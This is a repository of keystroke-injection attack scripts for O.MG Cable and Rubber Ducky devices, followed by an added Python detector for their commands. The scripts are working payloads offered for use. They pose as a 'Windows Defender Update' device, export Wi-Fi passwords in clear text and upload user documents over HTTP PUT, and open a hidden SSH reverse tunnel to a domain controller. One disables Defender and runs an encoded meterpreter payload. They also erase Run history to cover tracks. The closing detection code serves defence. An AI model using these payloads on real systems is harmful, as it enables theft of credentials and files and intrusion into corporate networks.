├── .gitignore
├── README.md
├── scripts
│   ├── Win-Get_SSID_Info-HTTP.ducky.txt
│   ├── Win-Get_SSID_Info-HTTP.omg.txt
│   ├── Win-SSH_DC_Tunnel.ducky.txt
│   ├── Win-SSH_DC_Tunnel.omg.txt
│   ├── Win-SimpleWebOpener.ducky.txt
│   ├── Win-SimpleWebOpener.omg.txt
│   └── wip
│       ├── Win-Exfiltrate_ALL-HTTP.omg.txt
│       ├── Win-Exfiltrate_Personal-HTTP.omg.txt
│       ├── Win-Gather_System_Info.ducky.txt
│       ├── powershell-load.txt
│       └── wallpaper-change.txt
└── todo.md


/.gitignore:
--------------------------------------------------------------------------------
.DS_Store
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
OMDucky
=============
Hello! This is a collection of scripts for O.MG Cable and Rubber Ducky. There should be a version for both systems, see `omg.txt` files vs `ducky.txt` files.

I've commented the details of how each script works directly in the script files. Notably, see any `~~` double-tilde line comments for strings that you need to modify per your own needs.

Some of these scripts are based on ideas of others; I will have links/shoutouts in the comments of those scripts as well.

The "wip" directory is for scripts that are not fully tested and that I'm still working on.


Notable Differences:
===========
- Since April 1st firmware, the majority of issues were fixed, and the syntax between O.MG and Rubber Ducky is almost exactly the same.
- Some syntax differences:
  - O.MG can set VID, PID, MAN and PRO fields, Rubber Ducky cannot
  - For Rubber Ducky, I recommend a delay before the first command is sent (`DELAY 2222`)
- Otherwise, the two script versions should be exactly the same
  - This generally means: Rubber Ducky scripts will work as-is in O.MG, although they might not be fully optimized


Useful Links
=========
O.MG Firmware - https://github.com/O-MG/O.MG_Cable-Firmware

--------------------------------------------------------------------------------
/scripts/Win-Get_SSID_Info-HTTP.ducky.txt:
--------------------------------------------------------------------------------
REM | Win-Get_SSID_Info-HTTP
REM |
REM | This script will gather the user's Wifi SSID profiles (including any PSK's/passcodes), zip them up,
REM | then upload them to some public HTTP server via PUT.
REM |
REM | This does require you setting up a HTTP server to receive the files, see comments in the script lines.
REM |
REM | See all "REM ~~" tilde lines below for code that needs to be modified!
REM |
REM | Based on ideas from dantedmc4 / Dante Sparda
REM | https://github.com/dantedmc4/poundplay
REM |
REM | Written by JeffTadashi
REM | https://github.com/JeffTadashi/omducky/
REM |
DELAY 2222
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
REM | Command below erases the "Run" history. This is optional.
STRING powershell "rp -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
DELAY 2000
REM | Export wlan profiles into xml files (including clear-text PSK's) into current directory
STRING netsh wlan export profile key=clear
ENTER
REM | Collect all xml files into a single zip file
STRING Compress-Archive -U -Path .\*.xml -DestinationPath .\temp.zip
ENTER
DELAY 3000
REM | Generate random filename base for uploading later
STRING $r=[System.IO.Path]::GetRandomFileName()
ENTER
REM | Upload via HTTP PUT method. Requires a public webserver with PUT capabilities.
REM | Here is an example python HTTP server: https://gist.github.com/fabiand/5628006
REM ~~ | Change "example.com" with public IP or domain-name of your HTTP server with PUT capabilities.
STRING Invoke-Restmethod -Uri http://example.com/$r.zip -Method Put -Infile .\temp.zip
ENTER
DELAY 2000
REM | File cleanup and exit...
STRING rm .\temp.zip
ENTER
STRING rm .\*.xml
ENTER
STRING exit
ENTER

--------------------------------------------------------------------------------
/scripts/Win-Get_SSID_Info-HTTP.omg.txt:
--------------------------------------------------------------------------------
REM | Win-Get_SSID_Info-HTTP
REM |
REM | This script will gather the user's Wifi SSID profiles (including any PSK's/passcodes), zip them up,
REM | then upload them to some public HTTP server via PUT.
REM |
REM | This does require you setting up a HTTP server to receive the files, see comments in the script lines.
REM |
REM | See all "REM ~~" tilde lines below for code that needs to be modified!
REM |
REM | Based on ideas from dantedmc4 / Dante Sparda
REM | https://github.com/dantedmc4/poundplay
REM |
REM | Written by JeffTadashi
REM | https://github.com/JeffTadashi/omducky/
REM |
VID 045E
PID 0048
MAN Microsoft
PRO Windows Defender Update
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
REM | Command below erases the "Run" history. This is optional.
STRING powershell "rp -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
DELAY 2000
REM | Export wlan profiles into xml files (including clear-text PSK's) into current directory
STRING netsh wlan export profile key=clear
ENTER
REM | Collect all xml files into a single zip file
STRING Compress-Archive -U -Path .\*.xml -DestinationPath .\temp.zip
ENTER
DELAY 3000
REM | Generate random filename base for uploading later
STRING $r=[System.IO.Path]::GetRandomFileName()
ENTER
REM | Upload via HTTP PUT method. Requires a public webserver with PUT capabilities.
REM | Here is an example python HTTP server: https://gist.github.com/fabiand/5628006
REM ~~ | Change "example.com" with public IP or domain-name of your HTTP server with PUT capabilities.
STRING Invoke-Restmethod -Uri http://example.com/$r.zip -Method Put -Infile .\temp.zip
ENTER
DELAY 2000
REM | File cleanup and exit...
STRING rm .\temp.zip
ENTER
STRING rm .\*.xml
ENTER
STRING exit
ENTER

--------------------------------------------------------------------------------
/scripts/Win-SSH_DC_Tunnel.ducky.txt:
--------------------------------------------------------------------------------
REM | Win-SSH_DC_Tunnel
REM |
REM | This script will identify an active Domain Controller, then build an SSH reverse tunnel to the attacker,
REM | giving the attacker network access to the Domain Controller.
REM |
REM | For setup, your attacker machine needs public IP ssh access with a user/password created for this purpose.
REM | Once script is successful, you can access common DC ports on this machine, such as "curl localhost:10080"
REM | (Common DC ports will have 10000 added to them, so SMB/445 will be at localhost:10445, etc)
REM |
REM | This script uses the built in SSH function that is installed by default on newer Win10 deployments.
REM | Does not require admin access on victim, and generally will be allowed by Windows Defender or other antiviruses.
REM | (However, this does not gain any shell access to victim machine)
REM | Script also hides the powershell console, and SSH runs in the background indefinitely.
REM |
REM | See all "REM ~~" tilde lines below for code that needs to be modified!
REM |
REM | Written by JeffTadashi
REM | https://github.com/JeffTadashi/omducky/
REM |
DELAY 2222
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
REM | Command below erases the "Run" history. This is optional.
REM | (DevNotes) To Test: change "Remove-ItemProperty" to "rp" for shortness
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
DELAY 2000
REM | In CMD prompt, use "%logonserver:~2%" to get plain DC server name.
REM | In powershell, use "$env:LOGONSERVER.substring(2)", but must be variable substituted. Substitution is below
STRING $D=$env:LOGONSERVER.substring(2)
ENTER
REM ~~ | Change the username@IP to your attacking machine, on a public IP
STRING powershell -windowstyle hidden -command ssh -fN -o "StrictHostKeyChecking=no" -R 10021:"$D":21 -R 10053:"$D":53 -R 10080:"$D":80 -R 10088:"$D":88 -R 10135:"$D":135 -R 10139:"$D":139 -R 10389:"$D":389 -R 10443:"$D":443 -R 10445:"$D":445 -R 10464:"$D":464 -R 10636:"$D":636 -R 13268:"$D":3268 -R 13269:"$D":3269 -R 13389:"$D":3389 -R 15985:"$D":5985 -R 15986:"$D":5986 username@IP
ENTER
DELAY 2000
REM ~~ | Change p@ssw0rd! below to the ssh user's password
STRING p@ssw0rd!
ENTER

--------------------------------------------------------------------------------
/scripts/Win-SSH_DC_Tunnel.omg.txt:
--------------------------------------------------------------------------------
REM | Win-SSH_DC_Tunnel
REM |
REM | This script will identify an active Domain Controller, then build an SSH reverse tunnel to the attacker,
REM | giving the attacker network access to the Domain Controller.
REM |
REM | For setup, your attacker machine needs public IP ssh access with a user/password created for this purpose.
REM | Once script is successful, you can access common DC ports on this machine, such as "curl localhost:10080"
REM | (Common DC ports will have 10000 added to them, so SMB/445 will be at localhost:10445, etc)
REM |
REM | This script uses the built in SSH function that is installed by default on newer Win10 deployments.
REM | Does not require admin access on victim, and generally will be allowed by Windows Defender or other antiviruses.
REM | (However, this does not gain any shell access to victim machine)
REM | Script also hides the powershell console, and SSH runs in the background indefinitely.
REM |
REM | See all "REM ~~" tilde lines below for code that needs to be modified!
REM |
REM | Written by JeffTadashi
REM | https://github.com/JeffTadashi/omducky/
REM |
VID 045E
PID 0048
MAN Microsoft
PRO Windows Defender Update
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
REM | Command below erases the "Run" history. This is optional.
REM | (DevNotes) To Test: change "Remove-ItemProperty" to "rp" for shortness
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
DELAY 2000
REM | In CMD prompt, use "%logonserver:~2%" to get plain DC server name.
REM | In powershell, use "$env:LOGONSERVER.substring(2)", but must be variable substituted. Substitution is below
STRING $D=$env:LOGONSERVER.substring(2)
ENTER
REM ~~ | Change the username@IP to your attacking machine, on a public IP
STRING powershell -windowstyle hidden -command ssh -fN -o "StrictHostKeyChecking=no" -R 10021:"$D":21 -R 10053:"$D":53 -R 10080:"$D":80 -R 10088:"$D":88 -R 10135:"$D":135 -R 10139:"$D":139 -R 10389:"$D":389 -R 10443:"$D":443 -R 10445:"$D":445 -R 10464:"$D":464 -R 10636:"$D":636 -R 13268:"$D":3268 -R 13269:"$D":3269 -R 13389:"$D":3389 -R 15985:"$D":5985 -R 15986:"$D":5986 username@IP
ENTER
DELAY 2000
REM ~~ | Change p@ssw0rd! below to the ssh user's password
STRING p@ssw0rd!
ENTER

--------------------------------------------------------------------------------
/scripts/Win-SimpleWebOpener.ducky.txt:
--------------------------------------------------------------------------------
REM | Win-SimpleWebOpener
REM |
REM | This is a script to simply open a web page in Windows 10/7.
REM |
REM | Can be used for fake phishing websites (see gophish.com), or for BSOD pranks (see fakebsod.com or geekprank.com)
REM |
REM | See all "REM ~~" tilde lines below for code that needs to be modified
REM |
REM | Written by JeffTadashi
REM | https://github.com/JeffTadashi/omducky/
REM |
DELAY 2222
GUI r
DELAY 1000
REM ~~ | Change line below to desired browser: chrome, firefox, iexplore, etc.
STRING chrome
ENTER
DELAY 4000
REM | Alt+D below moves cursor focus to the URL bar. This is needed for Internet Explorer and Edge (Does not impact Chrome or Firefox)
ALT d
REM ~~ | Change line below to desired URL
STRING http://fakebsod.com/windows-8-and-10
ENTER
REM ~~ | Change line below to "GUI UP" to maximize screen. Change line below to "F11" to fullscreen.
F11
--------------------------------------------------------------------------------
/scripts/Win-SimpleWebOpener.omg.txt:
--------------------------------------------------------------------------------
REM | Win-SimpleWebOpener
REM |
REM | This is a script to simply open a web page in Windows 10/7.
REM |
REM | Can be used for fake phishing websites (see gophish.com), or for BSOD pranks (see fakebsod.com or geekprank.com)
REM |
REM | See all "REM ~~" tilde lines below for code that needs to be modified
REM |
REM | Written by JeffTadashi
REM | https://github.com/JeffTadashi/omducky/
REM |
VID 045E
PID 0048
MAN Microsoft
PRO Windows Defender Update
GUI r
DELAY 1000
REM ~~ | Change line below to desired browser: chrome, firefox, iexplore, etc.
STRING chrome
ENTER
DELAY 4000
REM | Alt+D below moves cursor focus to the URL bar. This is needed for Internet Explorer and Edge (Does not impact Chrome or Firefox)
ALT d
REM ~~ | Change line below to desired URL
STRING http://fakebsod.com/windows-8-and-10
ENTER
REM ~~ | Change line below to "GUI UP" to maximize screen. Change line below to "F11" to fullscreen.
F11

--------------------------------------------------------------------------------
/scripts/wip/Win-Exfiltrate_ALL-HTTP.omg.txt:
--------------------------------------------------------------------------------
REM | Win-Exfiltrate_Personal-HTTP
REM |
REM | This script exfiltrates wireless SSID profiles and Doc/Down/Desk
REM | Condensed to single command, in hidden Powershell window, for best stealth.
REM |
REM |
REM | Written by JeffTadashi
REM | https://github.com/JeffTadashi/omducky/
REM |
VID 045E
PID 0048
MAN Microsoft
PRO Windows Defender Update
GUI r
DELAY 1000
STRING powershell -nop -w hidden
ENTER
DELAY 2000
STRING rp -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue;netsh wlan export profile key=clear;Compress-Archive -U -Path .\*.xml,~\Desktop\*,~\Downloads\*,~\Documents\* -DestinationPath .\temp.zip;$r=[System.IO.Path]::GetRandomFileName();irm -Uri http://192.168.200.202:8000/$r.zip -Method Put -Infile .\temp.zip;rm .\temp.zip,.\*.xml;exit
ENTER
--------------------------------------------------------------------------------
/scripts/wip/Win-Exfiltrate_Personal-HTTP.omg.txt:
--------------------------------------------------------------------------------
REM | Win-Exfiltrate_Personal-HTTP
REM |
REM | This script
REM |
REM |
REM |
REM | Written by JeffTadashi
REM | https://github.com/JeffTadashi/omducky/
REM |
VID 045E
PID 0048
MAN Microsoft
PRO Windows Defender Update
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
REM | Command below erases the "Run" history. This is optional.
STRING rp -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
ENTER
DELAY 2000
REM | Collect downloads/desktop/documents folders into a zip
STRING Compress-Archive -U -Path ~\Desktop\*,~\Downloads\*,~\Documents\* -DestinationPath .\temp.zip
ENTER
DELAY 3000
REM | Generate random filename base for uploading later
STRING $r=[System.IO.Path]::GetRandomFileName()
ENTER
REM | Upload via HTTP PUT method. Requires a public webserver with PUT capabilities.
REM | Here is an example python HTTP server: https://gist.github.com/fabiand/5628006
REM ~~ | Change "example.com" with public IP or domain-name of your HTTP server with PUT capabilities.
STRING Invoke-Restmethod -Uri http://example.com/$r.zip -Method Put -Infile .\temp.zip
ENTER
DELAY 2000
REM | File cleanup and exit...
STRING rm .\temp.zip
ENTER
STRING exit
ENTER
--------------------------------------------------------------------------------
/scripts/wip/Win-Gather_System_Info.ducky.txt:
--------------------------------------------------------------------------------


REM | Reference: https://github.com/nixawk/pentest-wiki/tree/master/1.Information-Gathering/Windows
DELAY 1000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 2000
STRING powershell -windowstyle hidden -command cmd
ENTER
DELAY 2000
STRING echo ##whoami >> sys
ENTER
STRING whoami >> sys
ENTER
STRING echo ##ver >> sys
ENTER
STRING ver >> sys
ENTER
STRING echo ##systeminfo >> sys
ENTER
STRING systeminfo >> sys
ENTER
STRING echo ##ipconfig /all >> sys
ENTER
STRING ipconfig /all >> sys
ENTER
STRING echo ##ipconfig /displaydns >> sys
ENTER
STRING ipconfig /displaydns >> sys
ENTER
DELAY 5000
STRING echo ##wmic os list brief >> sys
ENTER
STRING wmic os list brief >> sys
ENTER
STRING echo ##wmic computersystem list full >> sys
ENTER
STRING wmic computersystem list full >> sys
ENTER
STRING echo ##wmic qfe get hotfixid >> sys
ENTER
STRING wmic qfe get hotfixid >> sys
ENTER
STRING echo ##tasklist >> sys
ENTER
STRING tasklist >> sys
ENTER
STRING echo ##net user>> sys
ENTER
STRING net user >> sys
ENTER
STRING echo ##net use /domain >> sys
ENTER
STRING net user /domain >> sys
ENTER
STRING echo ##net group "Domain Admins" /domain >> sys
ENTER
STRING net group "Domain Admins" /domain >> sys
ENTER
STRING echo ##net group "Domain Controllers" /domain >> sys
ENTER
STRING net group "Domain Controllers" /domain >> sys
ENTER
DELAY 5000
STRING scp sys omg@192.168.200.224:~/
ENTER
DELAY 2000
REM ~~ | Change p@ssw0rd! below to the ssh user's password
STRING yes
ENTER
DELAY 5000
STRING del sys
ENTER
STRING exit
ENTER

--------------------------------------------------------------------------------
/scripts/wip/powershell-load.txt:
--------------------------------------------------------------------------------
REM |
REM |
REM |
REM |
REM |
REM |
REM (First, we will disable firewall through GUI traversal methods)
DELAY 1000
CONTROL ESCAPE
DELAY 2000
STRING virus & threat protection
DELAY 2000
ENTER
DELAY 3000
TAB
DELAY 80
TAB
DELAY 80
TAB
DELAY 80
ENTER
DELAY 3000
REM (Now on correct settings page to turn off real-time)
REM (Space to change to off)
SPACE
DELAY 2000
REM (Left then enter, to bypass user interaction)
LEFT
DELAY 100
ENTER
DELAY 2000
REM (exit settings dialogs)
ALT F4
DELAY 3000
REM (Now, we can start powershell execution)
CONTROL ESCAPE
DELAY 2000
STRING powershell
DELAY 2000
ENTER
DELAY 4000
REM (Open new powershell console as admin, close existing)
STRING Start-Process PowerShell -Verb RunAs; exit
DELAY 100
ENTER
REM hit LEFT and ENTER to go through Admin prompt
DELAY 2000
LEFT
DELAY 100
ENTER
DELAY 4000
REM ~~ Execute powershell command payload below, as admin, below:
REM TEMP Testing with payload (fw is fine enabled):
REM msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.200.16 LPORT=80 -f psh-cmd -o payload-x64-80.txt
REM (putting --shortest parameter didn't seem to work. Still need to test HTTPS without shortest...)
REM starting from "powershell.exe" part...
STRING powershell.exe -nop -w hidden -e [base64-encoded payload removed]
DELAY 500
ENTER
--------------------------------------------------------------------------------
/scripts/wip/wallpaper-change.txt:
--------------------------------------------------------------------------------
REM | WALLPAPER-CHANGE
REM |
REM | This is a script to download and change the wallpaper in Windows 10
REM |
REM | In order to work:
REM | - Windows must be using the default "Photos" app for opening photos
REM | - Internet Explorer was used at least once (and initial setup pop-ups, etc, are not present)
REM |
REM | See all "REM ~~" tilde lines below for code that needs to be modified
REM |
REM | Written by JeffTadashi (based off other Hak5 sources)
REM | https://github.com/JeffTadashi/luk-ducky
REM |
REM |
REM |
REM |
DELAY 1000
CONTROL ESCAPE
DELAY 2000
REM ~~Change link below to whatever you want the downloaded image/wallpaper to be
STRING iexplore http://www.thecuriosityworkshop.com/wp-content/uploads/2015/03/01-rubberduck-hongkong.jpg
DELAY 5000
ENTER
REM (Delay below waits for IE to open. To be safe, it's fairly long)
DELAY 9000
REM (Typing CNTL + 1 to switch to first tab. Sometimes IE opens a second tab on first startup)
CONTROL 1
DELAY 500
CONTROL s
DELAY 2000
ENTER
DELAY 500
REM (Now trying to close IE)
ALT F4
REM (General wait until next step)
DELAY 8000
CONTROL ESCAPE
DELAY 2000
REM ~~Change string below to match the filename of the image downloaded. This uses search, so best that the image has a unique name.
STRING 01-rubberduck-hongkong.jpg
DELAY 5000
ENTER
REM (This is the wait for Photos album to open)
DELAY 8000
TAB
DELAY 80
TAB
DELAY 80
TAB
DELAY 80
TAB
DELAY 80
TAB
DELAY 80
TAB
DELAY 80
TAB
DELAY 80
TAB
DELAY 80
TAB
DELAY 80
TAB
DELAY 80
TAB
DELAY 80
ENTER
DELAY 500
DOWN
DELAY 80
DOWN
DELAY 80
DOWN
DELAY 80
DOWN
DELAY 80
DOWN
DELAY 80
DOWN
DELAY 80
ENTER
DELAY 500
DOWN
DELAY 80
ENTER
DELAY 500
ALT F4
--------------------------------------------------------------------------------
/todo.md:
--------------------------------------------------------------------------------
TODO
============
- Create script: simple download and execute (no admin, no disable defender needed)
- Create script: HTTP-PUT upload zip'd user downloads, desktop, and documents folders
--------------------------------------------------------------------------------
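
A defender's view of the scripts in this repository, as an added example that is not part of the original project: the commands these payloads type leave recognisable process command lines and PowerShell script-block text, and because keystroke injection types them seconds apart, they cluster in time on one host. The rule names, the `(timestamp, host, text)` event shape, host names and sample events are constructed for illustration; map them onto your own process-creation and script-block logs.

```python
import base64
import re
from datetime import datetime, timedelta

# Indicator name -> pattern over a process command line or PowerShell
# script-block text. Each pattern targets a command the scripts above type.
RULES = {
    "runmru_cleared": re.compile(
        r"\b(remove-itemproperty|rp)\b.*explorer\\runmru", re.I),
    "wlan_keys_exported": re.compile(
        r"\bnetsh(\.exe)?\s+wlan\s+export\s+profile\b.*\bkey\s*=\s*clear\b", re.I),
    "ssh_reverse_tunnel": re.compile(
        r"\bssh(\.exe)?\b(?=.*\s(?-i:-R)\s)(?=.*stricthostkeychecking\s*=\s*no)", re.I),
    "hidden_encoded_powershell": re.compile(
        r"\bpowershell(\.exe)?\b(?=.*\s-w(indowstyle)?\s+hidden\b)"
        r"(?=.*\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,})", re.I),
    "http_put_upload": re.compile(
        r"\b(invoke-restmethod|irm)\b(?=.*-method\s+put\b)(?=.*-infile\b)", re.I),
}

# Target ports that indicate a directory or remote-management service is being forwarded.
AD_PORTS = {88: "kerberos", 389: "ldap", 445: "smb", 636: "ldaps",
            3268: "global-catalog", 3389: "rdp", 5985: "winrm"}


def match_indicators(text):
    """Return the sorted names of all rules that match one log record."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))


def exposed_services(cmdline):
    """Names of services that the `ssh -R listen:host:port` forwards would expose."""
    ports = re.findall(r"\s-R\s+\d+:\"?[^\s:\"]+\"?:(\d+)", cmdline)
    return sorted({AD_PORTS[int(p)] for p in ports if int(p) in AD_PORTS})


def correlate(events, window=timedelta(seconds=90), threshold=2):
    """Return {host: [indicators]} for hosts showing at least `threshold`
    distinct indicators inside one time window. A single indicator, or two
    that are hours apart, is left for lower-priority review."""
    hits = {}
    for ts, host, text in events:
        for name in match_indicators(text):
            hits.setdefault(host, []).append((datetime.fromisoformat(ts), name))
    alerts = {}
    for host, items in hits.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            names = {n for t, n in items[i:] if t - start <= window}
            if len(names) >= threshold:
                alerts[host] = sorted(names)
                break
    return alerts


# --- Constructed sample data (not taken from any real environment) ---
RUNMRU = r"rp -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*'"
SSH_CMD = (r'"C:\Windows\System32\OpenSSH\ssh.exe" -fN -o StrictHostKeyChecking=no '
           r'-R 10445:dc01:445 -R 10389:dc01:389 tunnel@203.0.113.10')
ENCODED = base64.b64encode("Write-Output 'constructed'".encode("utf-16-le")).decode()
HIDDEN_PS = "powershell.exe -nop -w hidden -e " + ENCODED

SAMPLE_EVENTS = [
    # Burst on one workstation: history wipe, Wi-Fi key export, upload.
    ("2024-05-01T10:00:03", "WS-0142", RUNMRU),
    ("2024-05-01T10:00:05", "WS-0142", "netsh wlan export profile key=clear"),
    ("2024-05-01T10:00:09", "WS-0142",
     r"Invoke-RestMethod -Uri http://upload.example.test/a.zip -Method Put -InFile .\temp.zip"),
    # History wipe followed by a reverse tunnel to directory services.
    ("2024-05-01T11:30:01", "WS-0201", RUNMRU.replace("rp ", "Remove-ItemProperty ", 1)),
    ("2024-05-01T11:30:04", "WS-0201", SSH_CMD),
    # Help desk exporting one profile: a single indicator, no alert.
    ("2024-05-01T09:00:00", "WS-0077", "netsh wlan show profiles"),
    ("2024-05-01T14:00:00", "WS-0077", r"netsh wlan export profile key=clear folder=C:\temp"),
    # Two indicators three hours apart: outside the window, no alert.
    ("2024-05-01T08:00:00", "WS-0300", HIDDEN_PS),
    ("2024-05-01T11:00:00", "WS-0300",
     r"irm -Uri http://upload.example.test/b.zip -Method Put -Infile .\temp.zip"),
]

if __name__ == "__main__":
    for host, names in correlate(SAMPLE_EVENTS).items():
        print(host, names)
    print("forwarded services:", exposed_services(SSH_CMD))
```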